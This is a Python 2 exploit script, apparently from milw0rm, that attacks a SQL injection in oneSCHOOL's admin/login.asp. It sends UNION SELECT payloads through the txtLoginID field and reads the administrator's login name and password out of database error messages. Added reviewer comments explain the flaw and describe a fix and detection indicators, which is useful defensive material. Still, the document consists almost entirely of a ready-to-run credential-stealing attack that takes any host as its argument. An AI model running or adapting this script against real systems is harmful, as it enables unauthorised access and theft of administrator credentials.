#!/usr/bin/python

#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.
#
# Reviewer notes (defender's reading of this script):
#  - Vulnerability class: the txtLoginID form field of admin/login.asp is
#    concatenated into a SQL statement, so a quote plus a UNION SELECT is
#    appended to the application's own query.  The long run of 1s in the
#    select list presumably pads the column count to match that query.
#  - Extraction channel: the script never actually logs in.  It splits the
#    response body on whitespace and reads the token two places after the
#    word 'varchar', so it relies on the server echoing a database error
#    (presumably a type-conversion error) that contains the selected value
#    -- confirm against a real response before trusting the parsing.
#  - Application-side fix: bind txtLoginID as a query parameter instead of
#    building the SQL string, and stop returning raw database error text
#    to the browser (verbose errors are what makes the value readable).
#  - Detection: a login POST whose txtLoginID contains a quote followed by
#    'union select' is a high-confidence indicator; two such requests in a
#    row (one naming LoginName, then one naming Password) is this script.
#  - Python 2 only: it uses the print statement, the '<>' operator and
#    urllib.urlopen / urllib.urlencode.

import urllib
from sys import argv

# First probe: ask UsersSecure for the smallest LoginName greater than 'a'.
# txtOperation, txtPassword and btnSubmit only make the POST look like an
# ordinary submission of the login form.
query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}

# Form-encode the first probe once; it is reused as the POST body below.
queryx = urllib.urlencode(query)

if len(argv)<>2:
    # Usage text; the sample "admin / 123" lines are illustrative output,
    # not values the script knows.
    print """
**********

Usage:
oneSCHOOLxpl.py [host]

[+] Exploiting...

[+] User: admin
[+] Password: 123

*******************
"""
else:
    try:
        print '\n[+] Exploting...\n'
        host = argv[1]
        # Accept a bare hostname as well as a full http:// URL.
        if host[0:7]<>'http://':
            host = 'http://'+host
        # POST the first probe and tokenize the HTML response on whitespace.
        url = urllib.urlopen(host+'/admin/login.asp', queryx)
        url = url.read()
        url = url.split()
        # The leaked value is taken as the token two positions after the
        # first 'varchar' in the page; surrounding quotes are stripped.
        name = url.index('varchar')+2
        name = url[name]
        name = name.replace("'","")
        print '[+] User: ' + name
        # Second probe: same technique, but selects the Password column for
        # the LoginName recovered above.  The recovered name is spliced
        # into the injected SQL unescaped.
        query2 = query.copy()
        query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
        query2 = urllib.urlencode(query2)
        url = urllib.urlopen(host+'/admin/login.asp', query2)
        url = url.read()
        url = url.split()
        # Same 'varchar'+2 token extraction as for the user name.
        passw = url.index('varchar')+2
        passw = url[passw]
        passw = passw.replace("'","")
        print '[+] Pass: '+passw
    except:
        # Bare except: a connection failure, a missing 'varchar' token or an
        # out-of-range index all end up here, so this message means only
        # "something failed", not a verified negative result.
        print '[+] Not vulnerable!'

# milw0rm.com [2007-12-31]